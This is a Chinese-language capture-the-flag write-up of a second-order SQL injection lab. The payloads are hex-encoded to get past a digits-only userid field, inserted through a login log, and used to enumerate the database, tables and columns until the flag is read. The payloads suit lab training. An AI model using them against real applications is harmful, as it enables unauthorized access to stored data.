免责声明:用户因使用公众号内容而产生的任何行为和后果,由用户自行承担责任。本公众号不承担因用户误解、不当使用等导致的法律责任
目录
首先二次注入难以使用工具sqlmap,需要登录才能注入,例如sql-labs靶场24关(比这个简单),首先确认inster插入字段数,然后就可以常规手法注入。其中-- qwe为--+
1.打开靶场
2.分析靶场
首先登录发现需要进行注册,因为提示为sql二次注入所以猜测需要登录才能注入,于是注册一个账号密码登录,登录后发现有修改个人信息的模块所以猜测这里就是注入点。其中有一个userid,我们猜测这个就是注入点,但是输入字符提示只能输入数字,所以我们将注入语句进行16进制转化后注入,打开登录日志发现有表如下,这表有查询修改插入的功能,当我们登录时数据进行插入,所以第一步为检测inster插入字段数为多少
1.构造pyload测试:
,1’,1,1,1) -- qwe 转换为16进制
解释:
-- qwe =--+
注入发现字段数为4所以接下来构建查询数据库表等语句
2.pyload:
1’,(select database()),1,1) -- qwe
查询得到一个表ctf
pyload:
1',(select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1) -- qwe
3.查询表中数据
Pyload:
1',(select group_concat(column_name) from information_schema.columns where table_name='injectflag'),1,1) -- qwe
4.查询fl4g
Pyload:
1',(select fl4g from injectflag limit 1,1),1,1) -- qwe
总结
首先二次注入难以使用工具sqlmap,需要登录才能注入,例如sql-labs靶场24关(比这个简单),首先确认inster插入字段数,然后就可以常规手法注入。其中-- qwe为--+
(需要源代码联系博主免费领取!!还希望多多关注点赞支持,你的支持就是我的最大动力!!!)